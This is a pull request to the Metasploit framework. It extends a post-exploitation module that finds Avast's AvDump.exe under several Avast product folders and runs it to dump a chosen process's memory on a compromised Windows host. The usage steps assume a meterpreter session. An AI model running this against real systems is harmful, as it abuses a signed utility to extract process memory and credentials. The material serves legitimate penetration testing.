### PR TITLE
Updating avast_memory_dump.rb - Adding additional AVDump.exe file paths

### DIFF
--- a/modules/post/windows/gather/avast_memory_dump.rb
+++ b/modules/post/windows/gather/avast_memory_dump.rb
@@ -31,7 +31,19 @@ class MetasploitModule < Msf::Post
   end
 
   def avdump_exists?
-    file_exist?('C:\\Program Files\\Avast Software\\Avast\\AvDump.exe')
+    avdump_paths = [
+      'C:\\Program Files\\Avast Software\\Avast\\AvDump.exe',
+      'C:\\Program Files\\Avast Software\\BreachGuard\\AvDump.exe',
+      'C:\\Program Files\\Avast Software\\Cleanup\\AvDump.exe',
+      'C:\\Program Files\\Avast Software\\Driver Updater\\AvDump.exe',
+      'C:\\Program Files\\Avast Software\\SecureLine VPN\\AvDump.exe'
+    ]
+
+    avdump_paths.each do |p|
+      if file_exist?(p.to_s)
+        return p.to_s
+      end
+    end
   end
 
   def run
@@ -42,8 +54,8 @@ class MetasploitModule < Msf::Post
     dump_path = datastore['DUMP_PATH']
     pid = datastore['PID'].to_s
 
-    print_status("Executing Avast mem dump utility against #{pid} to #{dump_path}")
-    result = cmd_exec("C:\\Program Files\\Avast Software\\Avast\\AvDump.exe --pid #{pid} --exception_ptr 0 --thread_id 0 --dump_file \"#{dump_path}\" --min_interval 0")
+    print_status("Executing Avast memory dumping utility (#{avdump_exists?}) against pid #{pid} writing to #{dump_path}")
+    result = cmd_exec("#{avdump_exists?} --pid #{pid} --exception_ptr 0 --thread_id 0 --dump_file \"#{dump_path}\" --min_interval 0")
 
     fail_with(Failure::Unknown, "Dump file #{dump_path} was not created") unless file_exist?(dump_path)
     print_status(dump_path)

--- a/modules/post/windows/gather/avast_memory_dump.rb
+++ b/modules/post/windows/gather/avast_memory_dump.rb
@@ -30,32 +30,33 @@ class MetasploitModule < Msf::Post
     ])
   end
 
-  def avdump_exists?
+  def avdump
     avdump_paths = [
-      'C:\\Program Files\\Avast Software\\Avast\\AvDump.exe',
-      'C:\\Program Files\\Avast Software\\BreachGuard\\AvDump.exe',
-      'C:\\Program Files\\Avast Software\\Cleanup\\AvDump.exe',
-      'C:\\Program Files\\Avast Software\\Driver Updater\\AvDump.exe',
-      'C:\\Program Files\\Avast Software\\SecureLine VPN\\AvDump.exe'
+      'Avast\\AvDump.exe',
+      'BreachGuard\\AvDump.exe',
+      'Cleanup\\AvDump.exe',
+      'Driver Updater\\AvDump.exe',
+      'SecureLine VPN\\AvDump.exe'
     ]
 
+    base = expand_path('%PROGRAMFILES%\\Avast Software\\')
     avdump_paths.each do |p|
-      if file_exist?(p.to_s)
-        return p.to_s
+      if file_exist?(base + p.to_s)
+        return base + p.to_s
       end
     end
   end
 
   def run
 
-    fail_with(Failure::NotVulnerable, 'AvDump.exe does not exist on target.') unless avdump_exists?
+    fail_with(Failure::NotVulnerable, 'AvDump.exe does not exist on target.') unless avdump
     print_status('AvDump.exe exists!')
 
     dump_path = datastore['DUMP_PATH']
     pid = datastore['PID'].to_s
 
-    print_status("Executing Avast memory dumping utility (#{avdump_exists?}) against pid #{pid} writing to #{dump_path}")
-    result = cmd_exec("#{avdump_exists?} --pid #{pid} --exception_ptr 0 --thread_id 0 --dump_file \"#{dump_path}\" --min_interval 0")
+    print_status("Executing Avast memory dumping utility (#{avdump}) against pid #{pid} writing to #{dump_path}")
+    result = cmd_exec("#{avdump} --pid #{pid} --exception_ptr 0 --thread_id 0 --dump_file \"#{dump_path}\" --min_interval 0")
 
     fail_with(Failure::Unknown, "Dump file #{dump_path} was not created") unless file_exist?(dump_path)
     print_status(dump_path)


### PR DESCRIPTION
## What is it?

This PR adds additional paths to check for the ```avdump.exe``` utility for the [avast memory dump](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/avast_memory_dump.rb) module. The Avast product line includes the ```avdump.exe``` utility in multiple products. The image below lists the additional file paths added to this module.

![AVDump-Multiple-Projects](https://user-images.githubusercontent.com/1250113/111076079-36ed2d80-84c1-11eb-938a-79085c759a09.png)



## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`.
- [x] Obtain meterpreter session on Windows host.
- [x] `use post/windows/gather/avast_memory_dump`.
- [x] Specify PID to dump (```set pid $PID```).
- [x] Specify SESSION to use (```set session $SESSION_NUMBER```) .
- [ ] ```run```.

![avdump-breachguard](https://user-images.githubusercontent.com/1250113/111076352-5b95d500-84c2-11eb-9981-c63428b78d2d.png)



